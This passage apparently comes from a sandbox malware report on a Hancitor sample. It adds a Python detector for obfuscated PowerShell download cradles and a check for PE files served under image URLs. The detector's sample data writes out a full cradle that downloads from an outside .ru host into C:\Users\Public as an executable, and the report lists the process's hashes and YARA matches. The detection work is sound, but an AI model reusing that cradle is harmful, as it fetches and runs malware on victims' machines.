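The Commandline field above is a compact PowerShell download cradle: -EX is an unambiguous prefix of -ExecutionPolicy (with the mixed-case value bYpASs), -NOp is -NoProfile, -w 1 is -WindowStyle with the integer value of Hidden, WGeT is a built-in alias of Invoke-WebRequest, and a URL ending in .jpg is written to an .exe under C:\Users\Public, which the next process entry then executes. Below is an added detection example (not part of this report and not Joe Security code) that parses such a command line the way PowerShell does, by case-insensitive parameter prefix, and also checks a fetched body for a PE header where the URL claims an image. The command lines and the response bytes are constructed samples; the first command line is the one shown in this entry.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Constructed samples: the cradle from the report entry above, and a benign admin invocation.
SAMPLE_CMDLINES = [
    r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe",
    r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
]
# Constructed response body: a PE header (MZ ... PE\0\0) served under a .jpg URL.
FAKE_JPG_RESPONSE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56 + b"PE\x00\x00"

# powershell.exe accepts any unambiguous prefix of a parameter name (-EX, -NOp, -w),
# so matching must be by case-insensitive prefix, not by exact switch.
PS_PARAMS = ["executionpolicy", "noprofile", "windowstyle", "noninteractive",
             "encodedcommand", "command", "file"]
DOWNLOAD_CMDLETS = {"wget", "iwr", "curl", "invoke-webrequest", "invoke-restmethod",
                    "start-bitstransfer"}
LURE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".pdf", ".txt"}
EXEC_EXTS = {".exe", ".dll", ".scr", ".xll", ".com"}
PUBLIC_DIR = "c:\\users\\public"
PE_MAGIC = b"MZ"


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted arguments whole and dropping the quotes."""
    raw = re.findall(r"'[^']*'|\"[^\"]*\"|\S+", cmdline)
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] and t[0] in "'\"" else t for t in raw]


def canonical_param(token: str) -> Optional[str]:
    """Expand an abbreviated powershell.exe switch (-EX -> executionpolicy); None if not a switch or ambiguous."""
    if not token.startswith("-"):
        return None
    prefix = token[1:].lower()
    matches = [p for p in PS_PARAMS if p.startswith(prefix)]
    return matches[0] if len(matches) == 1 else None


def _ext(path: str) -> str:
    m = re.search(r"\.[A-Za-z0-9]+$", path)
    return m.group(0).lower() if m else ""


@dataclass
class Finding:
    cmdline: str
    exec_policy_bypass: bool = False
    hidden_window: bool = False
    no_profile: bool = False
    download_cradle: bool = False
    url: Optional[str] = None
    outfile: Optional[str] = None
    extension_mismatch: bool = False
    public_dir_write: bool = False

    @property
    def indicators(self) -> List[str]:
        names = ["exec_policy_bypass", "hidden_window", "no_profile", "download_cradle",
                 "extension_mismatch", "public_dir_write"]
        return [n for n in names if getattr(self, n)]


def analyze(cmdline: str) -> Finding:
    """Walk the tokens once; each switch is interpreted together with the value that follows it."""
    f = Finding(cmdline)
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks):
        nxt = toks[i + 1].strip().lower() if i + 1 < len(toks) else ""
        param = canonical_param(tok)
        if param == "executionpolicy" and nxt in {"bypass", "unrestricted"}:
            f.exec_policy_bypass = True
        elif param == "windowstyle" and nxt in {"hidden", "1"}:   # ProcessWindowStyle.Hidden == 1
            f.hidden_window = True
        elif param == "noprofile":
            f.no_profile = True
        elif tok.lower() in DOWNLOAD_CMDLETS:
            f.download_cradle = True
            if nxt.startswith(("http://", "https://")):
                f.url = toks[i + 1].strip()      # the report's URL carries a trailing space inside the quotes
        elif tok.lower().startswith("-outf"):   # -OutFile of Invoke-WebRequest, also prefix-abbreviable
            f.outfile = toks[i + 1].strip() if i + 1 < len(toks) else None
    if f.url and f.outfile:
        if _ext(urlparse(f.url).path) in LURE_EXTS and _ext(f.outfile) in EXEC_EXTS:
            f.extension_mismatch = True
    if f.outfile and f.outfile.lower().replace("/", "\\").startswith(PUBLIC_DIR):
        f.public_dir_write = True
    return f


def is_suspicious(f: Finding) -> bool:
    """-NoProfile alone is common in legitimate automation; require a cradle plus a stronger indicator."""
    strong = {"exec_policy_bypass", "hidden_window", "extension_mismatch", "public_dir_write"}
    return (f.download_cradle and bool(strong & set(f.indicators))) or f.extension_mismatch


def content_type_mismatch(data: bytes, url: str) -> bool:
    """True when a URL with an image/document extension actually serves a PE image (MZ header)."""
    return _ext(urlparse(url).path) in LURE_EXTS and data[:2] == PE_MAGIC


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        f = analyze(c)
        print(f.indicators, is_suspicious(f))
    print(content_type_mismatch(FAKE_JPG_RESPONSE, "http://srand04rf.ru/08.jpg"))
```

Prefix expansion is the point worth taking away: a rule that matches the literal string "-ExecutionPolicy Bypass" misses this sample, while matching any prefix of the parameter name followed by "bypass" catches -EX, -Ex, -Exec and the full switch alike. The MZ check belongs wherever the downloaded body is available (proxy, sandbox, EDR file-create event), since the URL extension and the server's Content-Type are both attacker-controlled.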

General

Start time:16:31:07
Start date:08/07/2021
Path:C:\Users\Public\snd32sys.exe
Wow64 process (32bit):true
Commandline:'C:\Users\Public\snd32sys.exe'
Imagebase:0x610000
File size:763392 bytes
MD5 hash:ED1921467F6784AF6BDCA40A06A541B5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:low

Disassembly

Code Analysis
